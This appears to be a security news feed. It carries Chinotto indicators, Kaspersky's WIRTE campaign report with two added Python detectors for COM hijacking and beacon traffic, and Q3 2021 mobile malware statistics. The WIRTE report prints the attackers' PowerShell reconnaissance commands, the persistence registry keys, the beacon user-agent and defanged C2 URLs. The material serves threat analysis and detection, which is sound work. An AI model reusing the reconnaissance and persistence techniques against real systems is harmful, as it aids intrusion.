0dd115c565615651236fffaaf736e377
d8ad81bafd18658c52564bbdc89a7db2

Android application Chinotto

71b63d2c839c765f1f110dc898e79d67
c9fb6f127ca18a3c2cf94e405df67f51
3490053ea54dfc0af2e419be96462b08
cba17c78b84d1e440722178a97886bb7
56f3d2bcf67cf9f7b7d16ce8a5f8140a

Payload hosting URLs

hxxps://api[.]onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalVyZDlodU1wUWNjTGt4bXhBV0pjQU1ja2M_ZT1mUnc4VHg/root/content
hxxp://www[.]djsm.co[.]kr/js/20170805[.]hwp

Command and control server

hxxp://luminix[.]openhaja[.]com/bbs/data/proc1/proc[.]php
hxxp://luminix[.]kr/bbs/data/proc/proc[.]php
hxxp://kjdnc[.]gp114[.]net/data/log/do[.]php
hxxp://kumdo[.]org/admin/cont/do[.]php
hxxp://haeundaejugong[.]com/editor/chinotto/do[.]php
hxxp://haeundaejugong[.]com/data/jugong/do[.]php
hxxp://doseoul[.]com/bbs/data/hnc/update[.]php
hxxp://hz11[.]cn/jquery-ui-1[.]10[.]4/tests/unit/widget/doc/pu[.]php

MITRE ATT&CK mapping

Tactic: Technique (Technique Name)
  • Resource Development: T1584.006 Compromise Infrastructure: Web Services
  • Initial Access: T1566.001 Phishing: Spear-phishing Attachment
  • Execution: T1059.001 Command and Scripting Interpreter: PowerShell; T1059.005 Command and Scripting Interpreter: Visual Basic
  • Persistence: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
  • Defense Evasion: T1140 Deobfuscate/Decode Files or Information; T1036.005 Masquerading: Match Legitimate Name or Location
  • Discovery: T1033 System Owner/User Discovery; T1082 System Information Discovery
  • Collection: T1113 Screen Capture; T1560.002 Archive Collected Data: Archive via Library
  • Command and Control: T1071.001 Application Layer Protocol: Web Protocols; T1573.001 Encrypted Channel: Symmetric Cryptography
  • Exfiltration: T1041 Exfiltration Over C2 Channel

Fraudsters pose as Europol staff

Novinky.cz - security - 5 hours 35 min ago
Fraudsters are abusing the names and logos of Europol representatives in e-mails and social network messages; Europol is the European Union's agency for law enforcement cooperation. They use the names of Executive Director Catherine De Bolle, her deputy Jean-Philippe Lecouffe and other representatives of international law enforcement bodies. Hana Rubášová, spokesperson for the Police Presidium, issued the warning.
Category: Hacking & Security

WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019

Kaspersky Securelist - 6 hours 20 min ago

Overview

This February, during our hunting efforts for threat actors using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant. The implant itself is a VBS script with functionality to collect system information and execute arbitrary code sent by the attackers on the infected machine.

Although these intrusion sets may appear similar to the new MuddyWater first stage VBS implant used for reconnaissance and profiling activities, which we described recently in a private report, they have slightly different TTPs and wider targeting. To date, most of the known victims are located in the Middle East, but there are also targets in other regions. Various industries are affected by this campaign. The main focus is on government and diplomatic entities, though we also noticed an unusual targeting of law firms and financial institutions.

We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor.

Gaining an initial foothold

In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel/Word document. The Excel droppers observed in all instances were using Excel 4.0 macros – a technique that uses formulas in hidden spreadsheets or cells that execute macro 4.0 commands – to drop malware that in our particular case was named Ferocious dropper. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority.

However, in some cases we saw a fake ‘Kaspersky Update Agent’ executable acting as a dropper for the VBS implant. We were unable to confirm if this PE file was also distributed through email or downloaded by the threat actor after some initial penetration, but our analysis shows it has the same execution flow as the Excel 4.0 macros.

Sample VBS dropper Excel and Word documents, and executable

Exploitation, installation and persistence

Ferocious dropper

This first stage implant is composed of VBS and PowerShell scripts. The actor used some interesting new techniques in the dropper’s execution flow. Below, we break it down into three parts:

  1. Ferocious dropper: The Excel dropper, after the user opens it and disables the protected mode, will execute a series of formulas placed in a hidden column. Initially, they will hide the main spreadsheet that requested the user to “enable editing”, then unhide a secondary spreadsheet that contains the decoy, to avoid raising suspicion. The dropper will then run formulas from a third spreadsheet with hidden columns. The infection process will start by running three basic anti-sandbox checks using the Excel 4.0 function “GET.WORKSPACE”, with three integers:

    • 1: Get the name of the environment in which Microsoft Excel is running, as text, followed by the environment’s version number. The result will then be compared to a predefined Windows version in a hidden cell, for example: Windows (64-bit) NT :.00, Windows (64-bit) NT 6.01, Windows (32-bit) NT 10.00, Windows (32-bit) NT 6.02.

    • 19: Check if a mouse is present.

    • 42: Check if the host computer is capable of playing sounds.

      If any of the above checks fail, or if the Windows environment matches any of the aforementioned versions predefined in the document (different documents have different predefined versions), the process will halt. Otherwise, the macro will open a temporary %ProgramData%\winrm.txt file and save a VBS stager to %ProgramData%\winrm.vbs and set up registry keys for persistence.

  2. Ferocious run-1: After the macro finishes writing to disk, it runs winrm.vbs using explorer.exe. In turn, the VBS script will write an embedded PowerShell snippet to a predefined filename that varies between samples, for instance, %ProgramData%\regionh.txt. The VBS script will also add two important registry keys for persistence.

    The persistence technique observed in all intrusions uses COM hijacking. In this technique, the threat actor is able to add a Class ID in the current user registry hive (HKCU) referencing the malicious VBS script written previously to %ProgramData%\winrm.vbs. This registry modification will effectively invoke the malicious VBS script any time a program or script references “Scripting.Dictionary” COM programs during their execution.

    In our analysis and testing, the WinRM Scripting API called by the legitimate Windows VBS scripts "C:\Windows\System32\winrm.vbs" or "C:\Windows\SysWOW64\winrm.vbs" is able to trigger the persistence mechanism smoothly. Microsoft's command-line licensing tool slmgr.vbs provides similar results. Both winrm.vbs and slmgr.vbs were leveraged across different intrusions. The mechanism through which these scripts are invoked during the boot process is described in a later section.

    Registry keys used for COM hijacking

    After the above execution chain, the Excel 4.0 macro will clean up and delete the winrm.vbs and winrm.txt files.

  3. Ferocious run-2: The macro will continue after the cleanup by recreating and opening the same files, winrm.vbs and winrm.txt. However, this time it writes a PowerShell one-liner wrapped with VB code temporarily into %ProgramData%\winrm.txt and then saved into %ProgramData%\winrm.vbs. This one-liner acts as a stager for the PowerShell snippet written in regionh.txt mentioned above. Once successful, the macro invokes %ProgramData%\winrm.vbs again using explorer.exe, which in turn will execute the PowerShell snippet that connects to the C2 server and which we named LitePower Stager.
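A triage check for the COM-hijacking persistence described in steps 2 and 3, added here as an example and not part of Kaspersky's tooling: it parses the text of a .reg export of HKCU\Software\Classes\CLSID and flags user-hive COM servers that point at a script, that live in a user-writable directory such as %ProgramData%, or that use one of the two CLSIDs from the IoC section. The sample export, the ExampleVendor entry and the alice profile path are constructed.

```python
"""Triage check for COM-hijacking persistence of the kind described above:
a CLSID registered in the user hive (HKCU) whose COM server entry points at
a script in a user-writable location.  Added example, not Kaspersky's tooling;
it reads the text of a .reg export so it runs offline.  SAMPLE_REG is constructed."""
import re
from typing import Dict, List, Tuple

# The two CLSIDs listed in the report's IoC section.
REPORTED_CLSIDS = {
    "{50236F14-2C02-4291-93AB-B5A80F9666B0}",
    "{14C34482-E07F-44CF-B261-385B616C54EC}",
}
# A COM server should be a DLL or EXE; a script here is a strong hijack signal.
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|hta|ps1|bat|cmd)\b", re.I)
# %ProgramData% is WIRTE's working directory; %AppData%/%Temp% are the usual alternatives.
USER_WRITABLE = re.compile(
    r"(%programdata%|%appdata%|%temp%|\\programdata\\|\\appdata\\|\\users\\[^\\]+\\)", re.I)

# Only the server sub-keys of CLSIDs in the current-user hive are of interest.
KEY_RE = re.compile(
    r"^\[(?:HKEY_CURRENT_USER|HKCU)\\Software\\Classes\\CLSID\\"
    r"(\{[0-9A-F-]{36}\})\\(LocalServer32|InprocServer32)\]$", re.I)
DEFAULT_VALUE_RE = re.compile(r'^@="(.*)"$')

# Constructed .reg export: one key mimicking the reported persistence, one
# per-user install that should not be flagged, one script under a user profile.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{50236F14-2C02-4291-93AB-B5A80F9666B0}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{50236F14-2C02-4291-93AB-B5A80F9666B0}\LocalServer32]
@="C:\\ProgramData\\winrm.vbs"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AAAAAAAA-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Program Files\\ExampleVendor\\example.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{BBBBBBBB-0000-0000-0000-000000000002}\LocalServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\updater\\update.js"
"""


def _unescape(value: str) -> str:
    """Undo .reg escaping of backslashes and double quotes."""
    return re.sub(r'\\(["\\])', r"\1", value)


def parse_hkcu_com_servers(reg_text: str) -> Dict[Tuple[str, str], str]:
    """Map (CLSID, server key) -> default value for HKCU CLSID server keys."""
    servers: Dict[Tuple[str, str], str] = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = KEY_RE.match(line)
            current = (m.group(1).upper(), m.group(2)) if m else None
            continue
        if current is None:
            continue
        m = DEFAULT_VALUE_RE.match(line)
        if m:
            servers[current] = _unescape(m.group(1))
    return servers


def find_com_hijacks(reg_text: str) -> List[dict]:
    """Return one finding per suspicious HKCU COM server, with the reasons."""
    findings = []
    for (clsid, key), path in sorted(parse_hkcu_com_servers(reg_text).items()):
        reasons = []
        if clsid in REPORTED_CLSIDS:
            reasons.append("CLSID listed in the report's IoCs")
        if SCRIPT_EXT.search(path):
            reasons.append("COM server is a script rather than a DLL/EXE")
        if USER_WRITABLE.search(path):
            reasons.append("COM server lives in a user-writable directory")
        if reasons:
            findings.append({"clsid": clsid, "key": key, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_com_hijacks(SAMPLE_REG):
        print(f"{f['clsid']} {f['key']} -> {f['path']}")
        for r in f["reasons"]:
            print("   ", r)
```

Per-user software legitimately registers CLSIDs under HKCU, so entries flagged only for a user-writable path still need a manual look; a script as the COM server, or a reported CLSID, is the strong signal.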

LitePower stager

The implant is a small PowerShell script that acts as a downloader and secondary stager used to execute commands provided by its C2, and possibly download and deploy further malware.

LitePower PowerShell implant

This script is able to connect with the embedded C2 domain using predefined HTTP settings such as a unique User-Agent:

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0

Interestingly, and across the different incidents we observed, the “rv” field of the user agent has changed. In the example above, it is FTS_06. However, we have seen more than 10 variations (listed in the IoC section). We suspect these are used to track intrusions.

If the connection to the C2 server is successful, the script parses the output and invokes it using IEX. The script sleeps for a random number of seconds between 60 and 100 after each attempt to reach the C2. If the threat actor succeeds in establishing C2 communications using LitePower, further payloads containing system commands are sent back to the victim in the form of PowerShell functions through HTTP GET requests, and the command results are sent back as HTTP POST requests to the C2 server. The GET requests will be parsed by LitePower and invoked using PowerShell’s IEX function.
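As an added example (not Kaspersky's code), the check below applies the user-agent observation to constructed proxy log lines: it flags Firefox-shaped user-agents whose rv and Gecko fields cannot be genuine, groups hits by the rv tag (the per-intrusion marker), and measures GET-to-GET spacing against the 60 to 100 second sleep. The host names, client IPs and the FTS_11 tag are constructed; only FTS_06 and the Gecko/Firefox tokens come from the report.

```python
"""Spot LitePower-style beacons by the malformed Firefox User-Agent the report
quotes and group them by the 'rv' tag the operators vary per intrusion.
Added example, not Kaspersky's code; SAMPLE_LOG is constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed proxy log, one request per line:
#   <ISO-8601 time> <client IP> <method> <host> "<User-Agent>"
# FTS_06 is the rv tag quoted in the report; FTS_11 and all hosts/IPs are made up.
SAMPLE_LOG = """\
2021-02-10T09:00:00Z 10.0.0.5 GET c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0"
2021-02-10T09:00:05Z 10.0.0.5 POST c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0"
2021-02-10T09:01:20Z 10.0.0.5 GET c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0"
2021-02-10T09:01:22Z 10.0.0.5 POST c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0"
2021-02-10T09:02:55Z 10.0.0.5 GET c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0"
2021-02-10T09:00:30Z 10.0.0.9 GET c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_11) Gecko/22.36.35.06 Firefox/2.0"
2021-02-10T09:00:31Z 10.0.0.7 GET www.example.org "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"
2021-02-10T09:00:32Z 10.0.0.8 GET www.example.org "Mozilla/5.0 (Android 11; Mobile; rv:93.0) Gecko/93.0 Firefox/93.0"
2021-02-10T09:00:33Z 10.0.0.6 GET www.example.org "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (GET|POST) (\S+) "(.*)"$')
FIREFOX_UA_RE = re.compile(r"rv:([^)]+)\) Gecko/(\S+) Firefox/(\S+)")
DOTTED_NUMBER = re.compile(r"^\d+(\.\d+)*$")
POLL_MIN, POLL_MAX = 60, 110   # report: random 60-100 s sleep, plus slack for the round trip


def firefox_ua_anomalies(ua: str) -> list:
    """Reasons a Firefox-shaped UA looks forged; [] for genuine-looking or non-Firefox UAs."""
    m = FIREFOX_UA_RE.search(ua)
    if not m:
        return []
    rv, gecko, _firefox = m.groups()
    reasons = []
    if not DOTTED_NUMBER.match(rv):
        reasons.append(f"rv is not a version number: {rv}")
    # Desktop Firefox sends the fixed build date Gecko/20100101; Firefox for
    # Android sends Gecko/<rv>.  Anything else (e.g. Gecko/22.36.35.06) is off.
    if not (re.fullmatch(r"\d{8}", gecko) or gecko == rv):
        reasons.append(f"Gecko token is neither a build date nor the rv value: {gecko}")
    return reasons


def parse_log(text: str) -> list:
    """Turn the constructed log format into event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, method, host, ua = m.groups()
        events.append({"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "client": client, "method": method, "host": host, "ua": ua})
    return events


def litepower_report(text: str) -> dict:
    """Per suspicious rv tag: clients, C2 hosts, GET-to-GET gaps and a cadence verdict."""
    by_tag = defaultdict(list)
    for ev in parse_log(text):
        if firefox_ua_anomalies(ev["ua"]):
            by_tag[FIREFOX_UA_RE.search(ev["ua"]).group(1)].append(ev)
    report = {}
    for tag, evs in by_tag.items():
        gaps = {}
        for client in sorted({e["client"] for e in evs}):
            # GET = tasking poll, POST = results; measure poll-to-poll spacing
            polls = sorted(e["time"] for e in evs
                           if e["client"] == client and e["method"] == "GET")
            gaps[client] = [int((b - a).total_seconds()) for a, b in zip(polls, polls[1:])]
        report[tag] = {
            "clients": sorted(gaps),
            "hosts": sorted({e["host"] for e in evs}),
            "posted_results": any(e["method"] == "POST" for e in evs),
            "get_gaps_seconds": gaps,
            "litepower_cadence": any(g and all(POLL_MIN <= s <= POLL_MAX for s in g)
                                     for g in gaps.values()),
        }
    return report


if __name__ == "__main__":
    for tag, info in litepower_report(SAMPLE_LOG).items():
        print(tag, info)
```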

The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege. This is followed by the creation of a legitimate scheduled task to trigger “Scripting.Dictionary” COM programs; this will become the cornerstone that allows the persistence to work using the COM hijacking technique and the registry keys added during the installation phase described above.

Sample scheduled task settings referencing SLMGR.VBS to trigger WINRM.VBS through COM hijacking

The commands observed during the different intrusions are summarized below:

Command:
  Get-WmiObject Win32_logicaldisk -Filter 'DeviceID="C:"' | select volumeserialnumber
Description: List local disk drives

Command:
  $wmiQuery = 'SELECT * FROM AntiVirusProduct'
  $antivirusProduct = Get-WmiObject -Namespace 'root\SecurityCenter2' -Query $wmiQuery
  if($antivirusProduct.displayName -eq ''){$ret= 'N/A'}
  else{$ret= $antivirusProduct.displayName}
Description: Get list of antivirus software installed

Command:
  (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
Description: Check if current user has admin privileges

Command:
  ((Get-WmiObject win32_operatingsystem).caption) + ' x' + ((Get-WmiObject Win32_OperatingSystem).OSArchitecture).substring(0,2)
Description: Get operating system architecture

Additional long functions that we observed can be summarized as follows:

  • Function Get-ServiceStatus: checks for possible backdoors installed as services (MsDataSvc and NgcCtrlSvc), if the computer is part of a domain, and if the current user is a member of “Domain admins”.
  • Function Get-PersistenceStatus: checks for the registry keys added for COM hijacking.
  • Function Get-HotFixes: lists all hotfixes installed.
  • Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request.

Command and control

In our initial sample analysis, the C2 domain we observed was stgeorgebankers[.]com. After conducting pivots through malware samples, we were able to identify multiple C2 domains that date back to at least December 2019. These C2 domains were occasionally behind CloudFlare to obscure the real C2 IP address. Thanks to collaboration with our partners, we were able to gather some of the original C2 IP addresses, which allowed us to discover that the servers are hosted in Ukraine and Estonia.

Infrastructure overview

By looking for more machines presenting identical TLS certificates, we were able to identify additional domain names and IP addresses. Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443.

Victimology

Our telemetry indicates that the threat actor has targeted a variety of verticals including diplomatic and financial institutions, government, law firms, military organizations, and technology companies. The affected entities are located in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria and Turkey.

Threat actor assessment

We assess with high confidence that the intrusions discussed here are associated with the WIRTE threat actor group.

WIRTE used documents deploying Visual Basic Script (VBS), potentially delivered through spear phishing, with decoys in Arabic that were occasionally associated with Palestinian matters.

We see the same theme being followed in the intrusions discussed in this report. Both old and new intrusions leveraged VBS and PowerShell in similar ways to stage additional tools and communicate with the C2.

Even though the latest intrusions are using TCP/443 over HTTPS in C2 communications, the oldest intrusions explored in this report used similar ports to those mentioned in the public post by Lab52, such as TCP 2096 and 2087. In addition, the C2 requests explored here and in the public post have similar PowerShell IEX command execution and sleep functions.

Old C2 request highlighting the status condition, IEX invocation and 60-100 sleep function

New C2 request highlighting the status condition, IEX invocation and 60-100 sleep function

The snippets above also show the custom user-agents. Although the old intrusions had them encoded, the intrusions explored in this report had them in plain text. In both cases the adversaries identified separate intrusions by changing the “rv” field.

The C2s in both cases were protected by Cloudflare, and the real VPSs were under ASNs primarily in Ukraine (e.g., ASN 201094).

In the Lab52 post, the author described the use of a defense evasion and living-off-the-land (LotL) technique using regsvr32.exe, whereas in the intrusions explored in this report, the threat actor used a different LotL technique, COM hijacking. In both cases, the working directory is %ProgramData%.

All in all, we believe that all these similarities are a strong indication that the attacks described in this report were conducted by the WIRTE threat actor.

We assess with low confidence that WIRTE is a subgroup under the Gaza Cybergang umbrella. Although the three subgroups we are tracking use entirely different TTPs, they all occasionally use decoys associated with Palestinian matters, which we haven’t seen commonly used by other threat actors, especially those operating in the Middle East region such as MuddyWater and Oilrig.

Conclusion and outlook

WIRTE operators use simple and rather common TTPs that have allowed them to remain undetected for a long period of time. If our assessment of associating WIRTE with Gaza Cybergang proves to be correct in the future, it may signal a change in the group’s motivation. Gaza Cybergang is politically motivated and therefore primarily targets governmental and political entities; it is unusual for such groups to target law firms and financial institutions. Despite the targeting of these latter spheres, the majority of victims still fall within the government and diplomatic categories.

WIRTE modified their toolset and how they operate to remain stealthy for a longer period of time. Living-off-the-land (LotL) techniques are an interesting new addition to their TTPs. This suspected subgroup of Gaza Cybergang used simple yet effective methods to compromise its victims with better OpSec than its suspected counterparts. Using interpreted language malware such as VBS and PowerShell scripts, unlike the other Gaza Cybergang subgroups, adds flexibility to update their toolset and avoid static detection controls.

Whether WIRTE is a new subgroup or an evolution of existing Gaza Cybergang subgroups, we see them expanding their presence further in cyberspace by using updated and stealthier TTPs. In the near future we expect them to continue compromising their victims using the TTPs discussed in this report.

Indicators of compromise

Malicious documents and droppers

ecaaab9e2fc089eefb6accae9750ac60 xls.اللائحة الجنیسیة
a7802c9a4046edbcbe3f5a503de61867 doc.1803202155-تعمیم رقم
3a7425539f8853e7b89624890a5de25b saint george bankers & trust business offer.docx
5AE4505A5CA7235C842680C557D05383 slmgr.vbs
B2F8CCE7B03E7AA70DAB4A5D377375B5 exhaustedq.txt
8ade05c4b4e98cc89fa09bd513ea1a99 kaspersky update agent.exe

Class IDs in registry

HKCU:\Software\Classes\CLSID\{50236F14-2C02-4291-93AB-B5A80F9666B0}\LocalServer32
HKCU:\Software\Classes\CLSID\{14C34482-E07F-44CF-B261-385B616C54EC}\LocalServer32

File path

%AppData%\Temp\9127.tmp\9128.tmp\
%ProgramData%\

PDB paths

K:\Hacking\NgcCtrlSvc\NgcCtrlSvc\obj\Release\NgcCtrlSvc.pdb
K:\Hacking\Tools\MsDataSvc-v3\MsDataSvc\obj\Release\MsDataSvc.pdb

Domains and IPs


Interpol Arrests Over 1,000 Cyber Criminals From 20 Countries; Seizes $27 Million

The Hacker News - 6 hours 23 min ago
A joint four-month operation coordinated by Interpol, the international criminal police organization, has culminated in the arrests of more than 1,000 cybercriminals and the recovery of $27 million in illicit proceeds. Codenamed "HAECHI-II," the crackdown enabled law enforcement units from across 20 countries, as well as Hong Kong and Macao, to close 1,660 cases alongside blocking 2,350 bank
Category: Hacking & Security

Anatomy of a Linux Ransomware Attack

LinuxSecurity.com - 28 November 2021 - 13:00
Ransomware has dominated cybersecurity news headlines for the past decade, and for good reason. Through a combination of advanced encryption and effective extortion mechanisms, a ransomware attack can have devastating consequences for any victim including data loss, reputation harm, recovery costs and significant downtime.
Category: Hacking & Security

The British have a new Internet of Things law. It will ban default passwords on smart devices

Zive.cz - security - 28 November 2021 - 11:45
Smart vacuum cleaners, fridges and other appliances are attractive, but they carry a certain security risk. Manufacturers do not always secure Internet of Things products adequately, and the British government has run out of patience. It has come up with a new law that defines new security features that smart home ...
Category: Hacking & Security

Italy's Antitrust Regulator Fines Google and Apple for "Aggressive" Data Practices

The Hacker News - 27 November 2021 - 07:34
Italy's antitrust regulator has fined both Apple and Google €10 million each for what it calls are "aggressive" data practices and for not providing consumers with clear information on commercial uses of their personal data during the account creation phase. The Autorità Garante della Concorrenza e del Mercato (AGCM) said "Google and Apple did not provide clear and immediate information on the
Category: Hacking & Security

This New Stealthy JavaScript Loader Infecting Computers with Malware

The Hacker News - 27 November 2021 - 07:23
Threat actors have been found using a previously undocumented JavaScript malware strain that functions as a loader to distribute an array of remote access Trojans (RATs) and information stealers. HP Threat Research dubbed the new, evasive loader "RATDispenser," with the malware responsible for deploying at least eight different malware families in 2021. Around 155 samples of this new malware
Category: Hacking & Security

Israel Bans Sales of Hacking and Surveillance Tools to 65 Countries

The Hacker News - 27 November 2021 - 07:22
Israel's Ministry of Defense has dramatically restricted the number of countries to which cybersecurity firms in the country are allowed to sell offensive hacking and surveillance tools to, cutting off 65 nations from the export list. The revised list, details of which were first reported by the Israeli business newspaper Calcalist, now only includes 37 countries, down from the previous 102:
Category: Hacking & Security

Cloud Security: Don’t wait until your next bill to find out about an attack!

Sophos Naked Security - 26 November 2021 - 18:58
Cloud security is the best sort of altruism: you need to do it to protect yourself, but you help to protect everyone else at the same time.

Hackers Targeting Biomanufacturing Facilities With Tardigrade Malware

The Hacker News - 26 November 2021 - 14:20
An advanced persistent threat (APT) has been linked to cyberattacks on two biomanufacturing companies that occurred this year with the help of a custom malware loader called "Tardigrade." That's according to an advisory published by Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) this week, which noted that the malware is actively spreading across the sector with the likely goal of
Category: Hacking & Security

IT threat evolution in Q3 2021. Mobile statistics

Kaspersky Securelist - 26 November 2021 - 13:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2021:

  • 9,599,519 malware, adware and riskware attacks on mobile devices were prevented.
  • The largest share of all detected mobile threats accrued to RiskTool apps — 65.84%.
  • 676,190 malicious installation packages were detected, of which:
    • 12,097 packages were related to mobile banking Trojans;
    • 6,157 packages were mobile ransomware Trojans.

Quarterly highlights

The attackers became somewhat less active from the previous quarter — the number of mobile attacks dropped to 9.6 million. We have seen no new mass campaigns seeking to distribute any specific mobile malware family; nor were there any newsworthy events similar to what we had early into the COVID-19 pandemic.

Number of attacks targeting users of Kaspersky mobile solutions, Q1 2020 — Q3 2021

Yet Q3 also brought quite a few interesting finds. For instance, one of the modified WhatsApp builds, FMWhatsApp 16.80.0, contained the Triada Trojan along with an advertising SDK. The popularity of WhatsApp builds with extended functionality has secured this Trojan fifth place in our malware ranking.

In Q3, new Trojan families emerged, distributed through Google Play. To those we already knew — Trojan.AndroidOS.Jocker and Trojan.AndroidOS.MobOk (signing the user up to paid subscriptions) and Trojan-Dropper.AndroidOS.Necro (downloading payload from the attack server) — two more were added. The first one includes scam apps of Trojan.AndroidOS.Fakeapp variety exploiting the theme of social payments to cajole money out of the user; the second one is the fast growing family Trojan-PSW.AndroidOS.Facestealer stealing Facebook account data.

Mobile banking Trojans were progressing, too. For example, a curious trick was employed by the family Trojan-Banker.AndroidOS.Fakecalls active in Korea: if the user tries to call the bank, the malware disconnects the real call and plays prerecorded operator’s responses stored in the Trojan’s body.

Mobile threat statistics

In Q3 2021, Kaspersky detected 676,190 malicious installation packages — 209,915 less than in the previous quarter and 445,128 less than in Q3 2020.

Number of detected malicious installation packages, Q3 2020 — Q3 2021

Distribution of detected mobile malware by type

Distribution of newly detected mobile malware by type, Q2 and Q3 2021

Two thirds of all threats detected in Q3 2021 came from RiskTool apps (65.84%), their share up by 27.37 p.p. The vast majority of detected apps of this type (91.02%) belonged to the family SMSreg.

Adware came in second with 21.51% — 12.58 p.p. down from the previous quarter. The malicious objects we most frequently encountered came from the families AdWare.AndroidOS.FakeAdBlocker (34.29% of all detected threats in the category), AdWare.AndroidOS.HiddenAd (30.66%) and AdWare.AndroidOS.MobiDash (8.81%).

Various Trojans are in third place (2.79%), their share down by 13.69 p.p. The worst offenders were from the families Boogr (48.88%), Piom (11.04%) and Hiddad (7.52%).

Top 20 mobile malware programs

Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.

    Verdict                                  %*
 1  DangerousObject.Multi.Generic            33.02
 2  Trojan-SMS.AndroidOS.Agent.ado            6.87
 3  Trojan.AndroidOS.Whatreg.b                4.41
 4  Trojan.AndroidOS.Triada.dq                3.85
 5  Trojan.AndroidOS.Triada.ef                3.71
 6  Trojan.AndroidOS.Hiddad.gx                3.70
 7  DangerousObject.AndroidOS.GenericML       3.68
 8  Trojan.AndroidOS.Agent.vz                 3.63
 9  Trojan-Downloader.AndroidOS.Necro.d       3.56
10  Trojan-Dropper.AndroidOS.Hqwar.bk         3.43
11  Trojan-SMS.AndroidOS.Fakeapp.b            3.35
12  Trojan.AndroidOS.MobOk.ad                 3.13
13  Trojan.AndroidOS.Triada.el                2.76
14  Trojan-Downloader.AndroidOS.Agent.kx      2.21
15  Trojan-Dropper.AndroidOS.Hqwar.gen        1.74
16  Trojan-Downloader.AndroidOS.Gapac.e       1.71
17  Trojan-Dropper.AndroidOS.Agent.rp         1.66
18  Exploit.AndroidOS.Lotoor.be               1.66
19  Trojan.AndroidOS.Fakeapp.dn               1.64
20  Trojan-SMS.AndroidOS.Prizmes.a            1.53

* Unique users attacked by this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The first ten threats from the Top 20 in Q3 are those already featured in our rankings earlier.

First place as usual went to DangerousObject.Multi.Generic (33.02%), the verdict we use for malware detected with cloud technology. This technology comes into play whenever the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is essentially how the latest malware types are detected.

The Trojan-SMS.AndroidOS.Agent.ado malware — sender of text messages to short premium-rate numbers — has climbed from third to second place (6.87%).

Third place was taken by Trojan.AndroidOS.Whatreg.b (4.41%) allowing attackers to use the victim’s phone number to register new WhatsApp accounts controlled by them alone.

The Triada family Trojans are fourth, fifth and thirteenth in our ranking. They download and execute other malware on the infected device. Triada’s victims often suffer from the abovementioned Trojan.AndroidOS.Whatreg.b, as well as Trojan-Downloader.AndroidOS.Necro.d (9th, 3.56%), Trojan-Downloader.AndroidOS.Gapac.e (16th, 1.71%) and Trojan-Dropper.AndroidOS.Agent.rp (17th, 1.66%), all of which likely belong to the same campaign.

Trojan.AndroidOS.Hiddad.gx (3.70%), a source of annoying ads, rose to sixth position.

Seventh place was taken by DangerousObject.AndroidOS.GenericML (3.68%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

The malware Trojan.AndroidOS.Agent.vz (3.63%) — similarly to Triada, a link in the infection chain of various Trojans — dropped into eighth.

Tenth and fifteenth places were taken by members of the family Trojan-Dropper.AndroidOS.Hqwar — a dropper used to unpack and execute various banking Trojans on the target device.

